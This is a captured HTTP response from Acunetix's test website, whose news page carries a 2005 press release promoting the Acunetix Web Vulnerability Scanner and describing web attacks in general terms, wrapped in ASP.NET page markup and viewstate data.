0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:18 GMT Content-Length: 30581
Response Body - size: 30,581 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a 